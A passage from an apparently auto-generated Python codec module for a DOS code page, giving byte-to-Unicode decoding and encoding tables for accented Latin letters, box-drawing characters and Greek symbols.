0x0083: 0x00e2, # LATIN SMALL LETTER A WITH CIRCUMFLEX
0x0084: 0x00c2, # LATIN CAPITAL LETTER A WITH CIRCUMFLEX
0x0085: 0x00e0, # LATIN SMALL LETTER A WITH GRAVE
0x0086: 0x00b6, # PILCROW SIGN
0x0087: 0x00e7, # LATIN SMALL LETTER C WITH CEDILLA
0x0088: 0x00ea, # LATIN SMALL LETTER E WITH CIRCUMFLEX
0x0089: 0x00eb, # LATIN SMALL LETTER E WITH DIAERESIS
0x008a: 0x00e8, # LATIN SMALL LETTER E WITH GRAVE
0x008b: 0x00ef, # LATIN SMALL LETTER I WITH DIAERESIS
0x008c: 0x00ee, # LATIN SMALL LETTER I WITH CIRCUMFLEX
0x008d: 0x2017, # DOUBLE LOW LINE
0x008e: 0x00c0, # LATIN CAPITAL LETTER A WITH GRAVE
0x008f: 0x00a7, # SECTION SIGN
0x0090: 0x00c9, # LATIN CAPITAL LETTER E WITH ACUTE
0x0091: 0x00c8, # LATIN CAPITAL LETTER E WITH GRAVE
0x0092: 0x00ca, # LATIN CAPITAL LETTER E WITH CIRCUMFLEX
0x0093: 0x00f4, # LATIN SMALL LETTER O WITH CIRCUMFLEX
0x0094: 0x00cb, # LATIN CAPITAL LETTER E WITH DIAERESIS
0x0095: 0x00cf, # LATIN CAPITAL LETTER I WITH DIAERESIS
0x0096: 0x00fb, # LATIN SMALL LETTER U WITH CIRCUMFLEX
0x0097: 0x00f9, # LATIN SMALL LETTER U WITH GRAVE
0x0098: 0x00a4, # CURRENCY SIGN
0x0099: 0x00d4, # LATIN CAPITAL LETTER O WITH CIRCUMFLEX
0x009a: 0x00dc, # LATIN CAPITAL LETTER U WITH DIAERESIS
0x009b: 0x00a2, # CENT SIGN
0x009c: 0x00a3, # POUND SIGN
0x009d: 0x00d9, # LATIN CAPITAL LETTER U WITH GRAVE
0x009e: 0x00db, # LATIN CAPITAL LETTER U WITH CIRCUMFLEX
0x009f: 0x0192, # LATIN SMALL LETTER F WITH HOOK
0x00a0: 0x00a6, # BROKEN BAR
0x00a1: 0x00b4, # ACUTE ACCENT
0x00a2: 0x00f3, # LATIN SMALL LETTER O WITH ACUTE
0x00a3: 0x00fa, # LATIN SMALL LETTER U WITH ACUTE
0x00a4: 0x00a8, # DIAERESIS
0x00a5: 0x00b8, # CEDILLA
0x00a6: 0x00b3, # SUPERSCRIPT THREE
0x00a7: 0x00af, # MACRON
0x00a8: 0x00ce, # LATIN CAPITAL LETTER I WITH CIRCUMFLEX
0x00a9: 0x2310, # REVERSED NOT SIGN
0x00aa: 0x00ac, # NOT SIGN
0x00ab: 0x00bd, # VULGAR FRACTION ONE HALF
0x00ac: 0x00bc, # VULGAR FRACTION ONE QUARTER
0x00ad: 0x00be, # VULGAR FRACTION THREE QUARTERS
0x00ae: 0x00ab, # LEFT-POINTING DOUBLE ANGLE QUOTATION MARK
0x00af: 0x00bb, # RIGHT-POINTING DOUBLE ANGLE QUOTATION MARK
0x00b0: 0x2591, # LIGHT SHADE
0x00b1: 0x2592, # MEDIUM SHADE
0x00b2: 0x2593, # DARK SHADE
0x00b3: 0x2502, # BOX DRAWINGS LIGHT VERTICAL
0x00b4: 0x2524, # BOX DRAWINGS LIGHT VERTICAL AND LEFT
0x00b5: 0x2561, # BOX DRAWINGS VERTICAL SINGLE AND LEFT DOUBLE
0x00b6: 0x2562, # BOX DRAWINGS VERTICAL DOUBLE AND LEFT SINGLE
0x00b7: 0x2556, # BOX DRAWINGS DOWN DOUBLE AND LEFT SINGLE
0x00b8: 0x2555, # BOX DRAWINGS DOWN SINGLE AND LEFT DOUBLE
0x00b9: 0x2563, # BOX DRAWINGS DOUBLE VERTICAL AND LEFT
0x00ba: 0x2551, # BOX DRAWINGS DOUBLE VERTICAL
0x00bb: 0x2557, # BOX DRAWINGS DOUBLE DOWN AND LEFT
0x00bc: 0x255d, # BOX DRAWINGS DOUBLE UP AND LEFT
0x00bd: 0x255c, # BOX DRAWINGS UP DOUBLE AND LEFT SINGLE
0x00be: 0x255b, # BOX DRAWINGS UP SINGLE AND LEFT DOUBLE
0x00bf: 0x2510, # BOX DRAWINGS LIGHT DOWN AND LEFT
0x00c0: 0x2514, # BOX DRAWINGS LIGHT UP AND RIGHT
0x00c1: 0x2534, # BOX DRAWINGS LIGHT UP AND HORIZONTAL
0x00c2: 0x252c, # BOX DRAWINGS LIGHT DOWN AND HORIZONTAL
0x00c3: 0x251c, # BOX DRAWINGS LIGHT VERTICAL AND RIGHT
0x00c4: 0x2500, # BOX DRAWINGS LIGHT HORIZONTAL
0x00c5: 0x253c, # BOX DRAWINGS LIGHT VERTICAL AND HORIZONTAL
0x00c6: 0x255e, # BOX DRAWINGS VERTICAL SINGLE AND RIGHT DOUBLE
0x00c7: 0x255f, # BOX DRAWINGS VERTICAL DOUBLE AND RIGHT SINGLE
0x00c8: 0x255a, # BOX DRAWINGS DOUBLE UP AND RIGHT
0x00c9: 0x2554, # BOX DRAWINGS DOUBLE DOWN AND RIGHT
0x00ca: 0x2569, # BOX DRAWINGS DOUBLE UP AND HORIZONTAL
0x00cb: 0x2566, # BOX DRAWINGS DOUBLE DOWN AND HORIZONTAL
0x00cc: 0x2560, # BOX DRAWINGS DOUBLE VERTICAL AND RIGHT
0x00cd: 0x2550, # BOX DRAWINGS DOUBLE HORIZONTAL
0x00ce: 0x256c, # BOX DRAWINGS DOUBLE VERTICAL AND HORIZONTAL
0x00cf: 0x2567, # BOX DRAWINGS UP SINGLE AND HORIZONTAL DOUBLE
0x00d0: 0x2568, # BOX DRAWINGS UP DOUBLE AND HORIZONTAL SINGLE
0x00d1: 0x2564, # BOX DRAWINGS DOWN SINGLE AND HORIZONTAL DOUBLE
0x00d2: 0x2565, # BOX DRAWINGS DOWN DOUBLE AND HORIZONTAL SINGLE
0x00d3: 0x2559, # BOX DRAWINGS UP DOUBLE AND RIGHT SINGLE
0x00d4: 0x2558, # BOX DRAWINGS UP SINGLE AND RIGHT DOUBLE
0x00d5: 0x2552, # BOX DRAWINGS DOWN SINGLE AND RIGHT DOUBLE
0x00d6: 0x2553, # BOX DRAWINGS DOWN DOUBLE AND RIGHT SINGLE
0x00d7: 0x256b, # BOX DRAWINGS VERTICAL DOUBLE AND HORIZONTAL SINGLE
0x00d8: 0x256a, # BOX DRAWINGS VERTICAL SINGLE AND HORIZONTAL DOUBLE
0x00d9: 0x2518, # BOX DRAWINGS LIGHT UP AND LEFT
0x00da: 0x250c, # BOX DRAWINGS LIGHT DOWN AND RIGHT
0x00db: 0x2588, # FULL BLOCK
0x00dc: 0x2584, # LOWER HALF BLOCK
0x00dd: 0x258c, # LEFT HALF BLOCK
0x00de: 0x2590, # RIGHT HALF BLOCK
0x00df: 0x2580, # UPPER HALF BLOCK
0x00e0: 0x03b1, # GREEK SMALL LETTER ALPHA
0x00e1: 0x00df, # LATIN SMALL LETTER SHARP S
0x00e2: 0x0393, # GREEK CAPITAL LETTER GAMMA
0x00e3: 0x03c0, # GREEK SMALL LETTER PI
0x00e4: 0x03a3, # GREEK CAPITAL LETTER SIGMA
0x00e5: 0x03c3, # GREEK SMALL LETTER SIGMA
0x00e6: 0x00b5, # MICRO SIGN
0x00e7: 0x03c4, # GREEK SMALL LETTER TAU
0x00e8: 0x03a6, # GREEK CAPITAL LETTER PHI
0x00e9: 0x0398, # GREEK CAPITAL LETTER THETA
0x00ea: 0x03a9, # GREEK CAPITAL LETTER OMEGA
0x00eb: 0x03b4, # GREEK SMALL LETTER DELTA
0x00ec: 0x221e, # INFINITY
0x00ed: 0x03c6, # GREEK SMALL LETTER PHI
0x00ee: 0x03b5, # GREEK SMALL LETTER EPSILON
0x00ef: 0x2229, # INTERSECTION
0x00f0: 0x2261, # IDENTICAL TO
0x00f1: 0x00b1, # PLUS-MINUS SIGN
0x00f2: 0x2265, # GREATER-THAN OR EQUAL TO
0x00f3: 0x2264, # LESS-THAN OR EQUAL TO
0x00f4: 0x2320, # TOP HALF INTEGRAL
0x00f5: 0x2321, # BOTTOM HALF INTEGRAL
0x00f6: 0x00f7, # DIVISION SIGN
0x00f7: 0x2248, # ALMOST EQUAL TO
0x00f8: 0x00b0, # DEGREE SIGN
0x00f9: 0x2219, # BULLET OPERATOR
0x00fa: 0x00b7, # MIDDLE DOT
0x00fb: 0x221a, # SQUARE ROOT
0x00fc: 0x207f, # SUPERSCRIPT LATIN SMALL LETTER N
0x00fd: 0x00b2, # SUPERSCRIPT TWO
0x00fe: 0x25a0, # BLACK SQUARE
0x00ff: 0x00a0, # NO-BREAK SPACE
})
### Decoding Table
decoding_table = (
'\x00' # 0x0000 -> NULL
'\x01' # 0x0001 -> START OF HEADING
'\x02' # 0x0002 -> START OF TEXT
'\x03' # 0x0003 -> END OF TEXT
'\x04' # 0x0004 -> END OF TRANSMISSION
'\x05' # 0x0005 -> ENQUIRY
'\x06' # 0x0006 -> ACKNOWLEDGE
'\x07' # 0x0007 -> BELL
'\x08' # 0x0008 -> BACKSPACE
'\t' # 0x0009 -> HORIZONTAL TABULATION
'\n' # 0x000a -> LINE FEED
'\x0b' # 0x000b -> VERTICAL TABULATION
'\x0c' # 0x000c -> FORM FEED
'\r' # 0x000d -> CARRIAGE RETURN
'\x0e' # 0x000e -> SHIFT OUT
'\x0f' # 0x000f -> SHIFT IN
'\x10' # 0x0010 -> DATA LINK ESCAPE
'\x11' # 0x0011 -> DEVICE CONTROL ONE
'\x12' # 0x0012 -> DEVICE CONTROL TWO
'\x13' # 0x0013 -> DEVICE CONTROL THREE
'\x14' # 0x0014 -> DEVICE CONTROL FOUR
'\x15' # 0x0015 -> NEGATIVE ACKNOWLEDGE
'\x16' # 0x0016 -> SYNCHRONOUS IDLE
'\x17' # 0x0017 -> END OF TRANSMISSION BLOCK
'\x18' # 0x0018 -> CANCEL
'\x19' # 0x0019 -> END OF MEDIUM
'\x1a' # 0x001a -> SUBSTITUTE
'\x1b' # 0x001b -> ESCAPE
'\x1c' # 0x001c -> FILE SEPARATOR
'\x1d' # 0x001d -> GROUP SEPARATOR
'\x1e' # 0x001e -> RECORD SEPARATOR
'\x1f' # 0x001f -> UNIT SEPARATOR
' ' # 0x0020 -> SPACE
'!' # 0x0021 -> EXCLAMATION MARK
'"' # 0x0022 -> QUOTATION MARK
'#' # 0x0023 -> NUMBER SIGN
'$' # 0x0024 -> DOLLAR SIGN
'%' # 0x0025 -> PERCENT SIGN
'&' # 0x0026 -> AMPERSAND
"'" # 0x0027 -> APOSTROPHE
'(' # 0x0028 -> LEFT PARENTHESIS
')' # 0x0029 -> RIGHT PARENTHESIS
'*' # 0x002a -> ASTERISK
'+' # 0x002b -> PLUS SIGN
',' # 0x002c -> COMMA
'-' # 0x002d -> HYPHEN-MINUS
'.' # 0x002e -> FULL STOP
'/' # 0x002f -> SOLIDUS
'0' # 0x0030 -> DIGIT ZERO
'1' # 0x0031 -> DIGIT ONE
'2' # 0x0032 -> DIGIT TWO
'3' # 0x0033 -> DIGIT THREE
'4' # 0x0034 -> DIGIT FOUR
'5' # 0x0035 -> DIGIT FIVE
'6' # 0x0036 -> DIGIT SIX
'7' # 0x0037 -> DIGIT SEVEN
'8' # 0x0038 -> DIGIT EIGHT
'9' # 0x0039 -> DIGIT NINE
':' # 0x003a -> COLON
';' # 0x003b -> SEMICOLON
'<' # 0x003c -> LESS-THAN SIGN
'=' # 0x003d -> EQUALS SIGN
'>' # 0x003e -> GREATER-THAN SIGN
'?' # 0x003f -> QUESTION MARK
'@' # 0x0040 -> COMMERCIAL AT
'A' # 0x0041 -> LATIN CAPITAL LETTER A
'B' # 0x0042 -> LATIN CAPITAL LETTER B
'C' # 0x0043 -> LATIN CAPITAL LETTER C
'D' # 0x0044 -> LATIN CAPITAL LETTER D
'E' # 0x0045 -> LATIN CAPITAL LETTER E
'F' # 0x0046 -> LATIN CAPITAL LETTER F
'G' # 0x0047 -> LATIN CAPITAL LETTER G
'H' # 0x0048 -> LATIN CAPITAL LETTER H
'I' # 0x0049 -> LATIN CAPITAL LETTER I
'J' # 0x004a -> LATIN CAPITAL LETTER J
'K' # 0x004b -> LATIN CAPITAL LETTER K
'L' # 0x004c -> LATIN CAPITAL LETTER L
'M' # 0x004d -> LATIN CAPITAL LETTER M
'N' # 0x004e -> LATIN CAPITAL LETTER N
'O' # 0x004f -> LATIN CAPITAL LETTER O
'P' # 0x0050 -> LATIN CAPITAL LETTER P
'Q' # 0x0051 -> LATIN CAPITAL LETTER Q
'R' # 0x0052 -> LATIN CAPITAL LETTER R
'S' # 0x0053 -> LATIN CAPITAL LETTER S
'T' # 0x0054 -> LATIN CAPITAL LETTER T
'U' # 0x0055 -> LATIN CAPITAL LETTER U
'V' # 0x0056 -> LATIN CAPITAL LETTER V
'W' # 0x0057 -> LATIN CAPITAL LETTER W
'X' # 0x0058 -> LATIN CAPITAL LETTER X
'Y' # 0x0059 -> LATIN CAPITAL LETTER Y
'Z' # 0x005a -> LATIN CAPITAL LETTER Z
'[' # 0x005b -> LEFT SQUARE BRACKET
'\\' # 0x005c -> REVERSE SOLIDUS
']' # 0x005d -> RIGHT SQUARE BRACKET
'^' # 0x005e -> CIRCUMFLEX ACCENT
'_' # 0x005f -> LOW LINE
'`' # 0x0060 -> GRAVE ACCENT
'a' # 0x0061 -> LATIN SMALL LETTER A
'b' # 0x0062 -> LATIN SMALL LETTER B
'c' # 0x0063 -> LATIN SMALL LETTER C
'd' # 0x0064 -> LATIN SMALL LETTER D
'e' # 0x0065 -> LATIN SMALL LETTER E
'f' # 0x0066 -> LATIN SMALL LETTER F
'g' # 0x0067 -> LATIN SMALL LETTER G
'h' # 0x0068 -> LATIN SMALL LETTER H
'i' # 0x0069 -> LATIN SMALL LETTER I
'j' # 0x006a -> LATIN SMALL LETTER J
'k' # 0x006b -> LATIN SMALL LETTER K
'l' # 0x006c -> LATIN SMALL LETTER L
'm' # 0x006d -> LATIN SMALL LETTER M
'n' # 0x006e -> LATIN SMALL LETTER N
'o' # 0x006f -> LATIN SMALL LETTER O
'p' # 0x0070 -> LATIN SMALL LETTER P
'q' # 0x0071 -> LATIN SMALL LETTER Q
'r' # 0x0072 -> LATIN SMALL LETTER R
's' # 0x0073 -> LATIN SMALL LETTER S
't' # 0x0074 -> LATIN SMALL LETTER T
'u' # 0x0075 -> LATIN SMALL LETTER U
'v' # 0x0076 -> LATIN SMALL LETTER V
'w' # 0x0077 -> LATIN SMALL LETTER W
'x' # 0x0078 -> LATIN SMALL LETTER X
'y' # 0x0079 -> LATIN SMALL LETTER Y
'z' # 0x007a -> LATIN SMALL LETTER Z
'{' # 0x007b -> LEFT CURLY BRACKET
'|' # 0x007c -> VERTICAL LINE
'}' # 0x007d -> RIGHT CURLY BRACKET
'~' # 0x007e -> TILDE
'\x7f' # 0x007f -> DELETE
'\xc7' # 0x0080 -> LATIN CAPITAL LETTER C WITH CEDILLA
'\xfc' # 0x0081 -> LATIN SMALL LETTER U WITH DIAERESIS
'\xe9' # 0x0082 -> LATIN SMALL LETTER E WITH ACUTE
'\xe2' # 0x0083 -> LATIN SMALL LETTER A WITH CIRCUMFLEX
'\xc2' # 0x0084 -> LATIN CAPITAL LETTER A WITH CIRCUMFLEX
'\xe0' # 0x0085 -> LATIN SMALL LETTER A WITH GRAVE
'\xb6' # 0x0086 -> PILCROW SIGN
'\xe7' # 0x0087 -> LATIN SMALL LETTER C WITH CEDILLA
'\xea' # 0x0088 -> LATIN SMALL LETTER E WITH CIRCUMFLEX
'\xeb' # 0x0089 -> LATIN SMALL LETTER E WITH DIAERESIS
'\xe8' # 0x008a -> LATIN SMALL LETTER E WITH GRAVE
'\xef' # 0x008b -> LATIN SMALL LETTER I WITH DIAERESIS
'\xee' # 0x008c -> LATIN SMALL LETTER I WITH CIRCUMFLEX
'\u2017' # 0x008d -> DOUBLE LOW LINE
'\xc0' # 0x008e -> LATIN CAPITAL LETTER A WITH GRAVE
'\xa7' # 0x008f -> SECTION SIGN
'\xc9' # 0x0090 -> LATIN CAPITAL LETTER E WITH ACUTE
'\xc8' # 0x0091 -> LATIN CAPITAL LETTER E WITH GRAVE
'\xca' # 0x0092 -> LATIN CAPITAL LETTER E WITH CIRCUMFLEX
'\xf4' # 0x0093 -> LATIN SMALL LETTER O WITH CIRCUMFLEX
'\xcb' # 0x0094 -> LATIN CAPITAL LETTER E WITH DIAERESIS
'\xcf' # 0x0095 -> LATIN CAPITAL LETTER I WITH DIAERESIS
'\xfb' # 0x0096 -> LATIN SMALL LETTER U WITH CIRCUMFLEX
'\xf9' # 0x0097 -> LATIN SMALL LETTER U WITH GRAVE
'\xa4' # 0x0098 -> CURRENCY SIGN
'\xd4' # 0x0099 -> LATIN CAPITAL LETTER O WITH CIRCUMFLEX
'\xdc' # 0x009a -> LATIN CAPITAL LETTER U WITH DIAERESIS
'\xa2' # 0x009b -> CENT SIGN
'\xa3' # 0x009c -> POUND SIGN
'\xd9' # 0x009d -> LATIN CAPITAL LETTER U WITH GRAVE
'\xdb' # 0x009e -> LATIN CAPITAL LETTER U WITH CIRCUMFLEX
'\u0192' # 0x009f -> LATIN SMALL LETTER F WITH HOOK
'\xa6' # 0x00a0 -> BROKEN BAR
'\xb4' # 0x00a1 -> ACUTE ACCENT
'\xf3' # 0x00a2 -> LATIN SMALL LETTER O WITH ACUTE
'\xfa' # 0x00a3 -> LATIN SMALL LETTER U WITH ACUTE
'\xa8' # 0x00a4 -> DIAERESIS
'\xb8' # 0x00a5 -> CEDILLA
'\xb3' # 0x00a6 -> SUPERSCRIPT THREE
'\xaf' # 0x00a7 -> MACRON
'\xce' # 0x00a8 -> LATIN CAPITAL LETTER I WITH CIRCUMFLEX
'\u2310' # 0x00a9 -> REVERSED NOT SIGN
'\xac' # 0x00aa -> NOT SIGN
'\xbd' # 0x00ab -> VULGAR FRACTION ONE HALF
'\xbc' # 0x00ac -> VULGAR FRACTION ONE QUARTER
'\xbe' # 0x00ad -> VULGAR FRACTION THREE QUARTERS
'\xab' # 0x00ae -> LEFT-POINTING DOUBLE ANGLE QUOTATION MARK
'\xbb' # 0x00af -> RIGHT-POINTING DOUBLE ANGLE QUOTATION MARK
'\u2591' # 0x00b0 -> LIGHT SHADE
'\u2592' # 0x00b1 -> MEDIUM SHADE
'\u2593' # 0x00b2 -> DARK SHADE
'\u2502' # 0x00b3 -> BOX DRAWINGS LIGHT VERTICAL
'\u2524' # 0x00b4 -> BOX DRAWINGS LIGHT VERTICAL AND LEFT
'\u2561' # 0x00b5 -> BOX DRAWINGS VERTICAL SINGLE AND LEFT DOUBLE
'\u2562' # 0x00b6 -> BOX DRAWINGS VERTICAL DOUBLE AND LEFT SINGLE
'\u2556' # 0x00b7 -> BOX DRAWINGS DOWN DOUBLE AND LEFT SINGLE
'\u2555' # 0x00b8 -> BOX DRAWINGS DOWN SINGLE AND LEFT DOUBLE
'\u2563' # 0x00b9 -> BOX DRAWINGS DOUBLE VERTICAL AND LEFT
'\u2551' # 0x00ba -> BOX DRAWINGS DOUBLE VERTICAL
'\u2557' # 0x00bb -> BOX DRAWINGS DOUBLE DOWN AND LEFT
'\u255d' # 0x00bc -> BOX DRAWINGS DOUBLE UP AND LEFT
'\u255c' # 0x00bd -> BOX DRAWINGS UP DOUBLE AND LEFT SINGLE
'\u255b' # 0x00be -> BOX DRAWINGS UP SINGLE AND LEFT DOUBLE
'\u2510' # 0x00bf -> BOX DRAWINGS LIGHT DOWN AND LEFT
'\u2514' # 0x00c0 -> BOX DRAWINGS LIGHT UP AND RIGHT
'\u2534' # 0x00c1 -> BOX DRAWINGS LIGHT UP AND HORIZONTAL
'\u252c' # 0x00c2 -> BOX DRAWINGS LIGHT DOWN AND HORIZONTAL
'\u251c' # 0x00c3 -> BOX DRAWINGS LIGHT VERTICAL AND RIGHT
'\u2500' # 0x00c4 -> BOX DRAWINGS LIGHT HORIZONTAL
'\u253c' # 0x00c5 -> BOX DRAWINGS LIGHT VERTICAL AND HORIZONTAL
'\u255e' # 0x00c6 -> BOX DRAWINGS VERTICAL SINGLE AND RIGHT DOUBLE
'\u255f' # 0x00c7 -> BOX DRAWINGS VERTICAL DOUBLE AND RIGHT SINGLE
'\u255a' # 0x00c8 -> BOX DRAWINGS DOUBLE UP AND RIGHT
'\u2554' # 0x00c9 -> BOX DRAWINGS DOUBLE DOWN AND RIGHT
'\u2569' # 0x00ca -> BOX DRAWINGS DOUBLE UP AND HORIZONTAL
'\u2566' # 0x00cb -> BOX DRAWINGS DOUBLE DOWN AND HORIZONTAL
'\u2560' # 0x00cc -> BOX DRAWINGS DOUBLE VERTICAL AND RIGHT
'\u2550' # 0x00cd -> BOX DRAWINGS DOUBLE HORIZONTAL
'\u256c' # 0x00ce -> BOX DRAWINGS DOUBLE VERTICAL AND HORIZONTAL
'\u2567' # 0x00cf -> BOX DRAWINGS UP SINGLE AND HORIZONTAL DOUBLE
'\u2568' # 0x00d0 -> BOX DRAWINGS UP DOUBLE AND HORIZONTAL SINGLE
'\u2564' # 0x00d1 -> BOX DRAWINGS DOWN SINGLE AND HORIZONTAL DOUBLE
'\u2565' # 0x00d2 -> BOX DRAWINGS DOWN DOUBLE AND HORIZONTAL SINGLE
'\u2559' # 0x00d3 -> BOX DRAWINGS UP DOUBLE AND RIGHT SINGLE
'\u2558' # 0x00d4 -> BOX DRAWINGS UP SINGLE AND RIGHT DOUBLE
'\u2552' # 0x00d5 -> BOX DRAWINGS DOWN SINGLE AND RIGHT DOUBLE
'\u2553' # 0x00d6 -> BOX DRAWINGS DOWN DOUBLE AND RIGHT SINGLE
'\u256b' # 0x00d7 -> BOX DRAWINGS VERTICAL DOUBLE AND HORIZONTAL SINGLE
'\u256a' # 0x00d8 -> BOX DRAWINGS VERTICAL SINGLE AND HORIZONTAL DOUBLE
'\u2518' # 0x00d9 -> BOX DRAWINGS LIGHT UP AND LEFT
'\u250c' # 0x00da -> BOX DRAWINGS LIGHT DOWN AND RIGHT
'\u2588' # 0x00db -> FULL BLOCK
'\u2584' # 0x00dc -> LOWER HALF BLOCK
'\u258c' # 0x00dd -> LEFT HALF BLOCK
'\u2590' # 0x00de -> RIGHT HALF BLOCK
'\u2580' # 0x00df -> UPPER HALF BLOCK
'\u03b1' # 0x00e0 -> GREEK SMALL LETTER ALPHA
'\xdf' # 0x00e1 -> LATIN SMALL LETTER SHARP S
'\u0393' # 0x00e2 -> GREEK CAPITAL LETTER GAMMA
'\u03c0' # 0x00e3 -> GREEK SMALL LETTER PI
'\u03a3' # 0x00e4 -> GREEK CAPITAL LETTER SIGMA
'\u03c3' # 0x00e5 -> GREEK SMALL LETTER SIGMA
'\xb5' # 0x00e6 -> MICRO SIGN
'\u03c4' # 0x00e7 -> GREEK SMALL LETTER TAU
'\u03a6' # 0x00e8 -> GREEK CAPITAL LETTER PHI
'\u0398' # 0x00e9 -> GREEK CAPITAL LETTER THETA
'\u03a9' # 0x00ea -> GREEK CAPITAL LETTER OMEGA
'\u03b4' # 0x00eb -> GREEK SMALL LETTER DELTA
'\u221e' # 0x00ec -> INFINITY
'\u03c6' # 0x00ed -> GREEK SMALL LETTER PHI
'\u03b5' # 0x00ee -> GREEK SMALL LETTER EPSILON
'\u2229' # 0x00ef -> INTERSECTION
'\u2261' # 0x00f0 -> IDENTICAL TO
'\xb1' # 0x00f1 -> PLUS-MINUS SIGN
'\u2265' # 0x00f2 -> GREATER-THAN OR EQUAL TO
'\u2264' # 0x00f3 -> LESS-THAN OR EQUAL TO
'\u2320' # 0x00f4 -> TOP HALF INTEGRAL
'\u2321' # 0x00f5 -> BOTTOM HALF INTEGRAL
'\xf7' # 0x00f6 -> DIVISION SIGN
'\u2248' # 0x00f7 -> ALMOST EQUAL TO
'\xb0' # 0x00f8 -> DEGREE SIGN
'\u2219' # 0x00f9 -> BULLET OPERATOR
'\xb7' # 0x00fa -> MIDDLE DOT
'\u221a' # 0x00fb -> SQUARE ROOT
'\u207f' # 0x00fc -> SUPERSCRIPT LATIN SMALL LETTER N
'\xb2' # 0x00fd -> SUPERSCRIPT TWO
'\u25a0' # 0x00fe -> BLACK SQUARE
'\xa0' # 0x00ff -> NO-BREAK SPACE
)
### Encoding Map
encoding_map = {
0x0000: 0x0000, # NULL
0x0001: 0x0001, # START OF HEADING
0x0002: 0x0002, # START OF TEXT
0x0003: 0x0003, # END OF TEXT
0x0004: 0x0004, # END OF TRANSMISSION
0x0005: 0x0005, # ENQUIRY
0x0006: 0x0006, # ACKNOWLEDGE
0x0007: 0x0007, # BELL
0x0008: 0x0008, # BACKSPACE
0x0009: 0x0009, # HORIZONTAL TABULATION
0x000a: 0x000a, # LINE FEED
0x000b: 0x000b, # VERTICAL TABULATION
0x000c: 0x000c, # FORM FEED
0x000d: 0x000d, # CARRIAGE RETURN
0x000e: 0x000e, # SHIFT OUT
0x000f: 0x000f, # SHIFT IN
0x0010: 0x0010, # DATA LINK ESCAPE
0x0011: 0x0011, # DEVICE CONTROL ONE
0x0012: 0x0012, # DEVICE CONTROL TWO
0x0013: 0x0013, # DEVICE CONTROL THREE
0x0014: 0x0014, # DEVICE CONTROL FOUR
0x0015: 0x0015, # NEGATIVE ACKNOWLEDGE
0x0016: 0x0016, # SYNCHRONOUS IDLE
0x0017: 0x0017, # END OF TRANSMISSION BLOCK
0x0018: 0x0018, # CANCEL
0x0019: 0x0019, # END OF MEDIUM
0x001a: 0x001a, # SUBSTITUTE
0x001b: 0x001b, # ESCAPE
0x001c: 0x001c, # FILE SEPARATOR
0x001d: 0x001d, # GROUP SEPARATOR
0x001e: 0x001e, # RECORD SEPARATOR
0x001f: 0x001f, # UNIT SEPARATOR
0x0020: 0x0020, # SPACE
0x0021: 0x0021, # EXCLAMATION MARK
0x0022: 0x0022, # QUOTATION MARK
0x0023: 0x0023, # NUMBER SIGN
0x0024: 0x0024, # DOLLAR SIGN
0x0025: 0x0025, # PERCENT SIGN
0x0026: 0x0026, # AMPERSAND
0x0027: 0x0027, # APOSTROPHE
0x0028: 0x0028, # LEFT PARENTHESIS
0x0029: 0x0029, # RIGHT PARENTHESIS
0x002a: 0x002a, # ASTERISK
0x002b: 0x002b, # PLUS SIGN
0x002c: 0x002c, # COMMA
0x002d: 0x002d, # HYPHEN-MINUS
0x002e: 0x002e, # FULL STOP
0x002f: 0x002f, # SOLIDUS
0x0030: 0x0030, # DIGIT ZERO
0x0031: 0x0031, # DIGIT ONE
0x0032: 0x0032, # DIGIT TWO
0x0033: 0x0033, # DIGIT THREE
0x0034: 0x0034, # DIGIT FOUR
0x0035: 0x0035, # DIGIT FIVE
0x0036: 0x0036, # DIGIT SIX
0x0037: 0x0037, # DIGIT SEVEN
0x0038: 0x0038, # DIGIT EIGHT
0x0039: 0x0039, # DIGIT NINE
0x003a: 0x003a, # COLON
0x003b: 0x003b, # SEMICOLON
0x003c: 0x003c, # LESS-THAN SIGN
0x003d: 0x003d, # EQUALS SIGN
0x003e: 0x003e, # GREATER-THAN SIGN
0x003f: 0x003f, # QUESTION MARK
0x0040: 0x0040, # COMMERCIAL AT
0x0041: 0x0041, # LATIN CAPITAL LETTER A
0x0042: 0x0042, # LATIN CAPITAL LETTER B
0x0043: 0x0043, # LATIN CAPITAL LETTER C
0x0044: 0x0044, # LATIN CAPITAL LETTER D
0x0045: 0x0045, # LATIN CAPITAL LETTER E
0x0046: 0x0046, # LATIN CAPITAL LETTER F
0x0047: 0x0047, # LATIN CAPITAL LETTER G
0x0048: 0x0048, # LATIN CAPITAL LETTER H
0x0049: 0x0049, # LATIN CAPITAL LETTER I
0x004a: 0x004a, # LATIN CAPITAL LETTER J
0x004b: 0x004b, # LATIN CAPITAL LETTER K
0x004c: 0x004c, # LATIN CAPITAL LETTER L
0x004d: 0x004d, # LATIN CAPITAL LETTER M
0x004e: 0x004e, # LATIN CAPITAL LETTER N
0x004f: 0x004f, # LATIN CAPITAL LETTER O
0x0050: 0x0050, # LATIN CAPITAL LETTER P
0x0051: 0x0051, # LATIN CAPITAL LETTER Q
0x0052: 0x0052, # LATIN CAPITAL LETTER R
0x0053: 0x0053, # LATIN CAPITAL LETTER S
0x0054: 0x0054, # LATIN CAPITAL LETTER T
0x0055: 0x0055, # LATIN CAPITAL LETTER U
0x0056: 0x0056, # LATIN CAPITAL LETTER V
0x0057: 0x0057, # LATIN CAPITAL LETTER W
0x0058: 0x0058, # LATIN CAPITAL LETTER X
0x0059: 0x0059, # LATIN CAPITAL LETTER Y
0x005a: 0x005a, # LATIN CAPITAL LETTER Z
0x005b: 0x005b, # LEFT SQUARE BRACKET
0x005c: 0x005c, # REVERSE SOLIDUS
0x005d: 0x005d, # RIGHT SQUARE BRACKET
0x005e: 0x005e, # CIRCUMFLEX ACCENT
0x005f: 0x005f, # LOW LINE
0x0060: 0x0060, # GRAVE ACCENT
0x0061: 0x0061, # LATIN SMALL LETTER A
0x0062: 0x0062, # LATIN SMALL LETTER B
0x0063: 0x0063, # LATIN SMALL LETTER C
0x0064: 0x0064, # LATIN SMALL LETTER D
0x0065: 0x0065, # LATIN SMALL LETTER E
0x0066: 0x0066, # LATIN SMALL LETTER F
0x0067: 0x0067, # LATIN SMALL LETTER G
0x0068: 0x0068, # LATIN SMALL LETTER H
0x0069: 0x0069, # LATIN SMALL LETTER I
0x006a: 0x006a, # LATIN SMALL LETTER J
0x006b: 0x006b, # LATIN SMALL LETTER K
0x006c: 0x006c, # LATIN SMALL LETTER L
0x006d: 0x006d, # LATIN SMALL LETTER M
0x006e: 0x006e, # LATIN SMALL LETTER N
0x006f: 0x006f, # LATIN SMALL LETTER O
0x0070: 0x0070, # LATIN SMALL LETTER P
0x0071: 0x0071, # LATIN SMALL LETTER Q
0x0072: 0x0072, # LATIN SMALL LETTER R
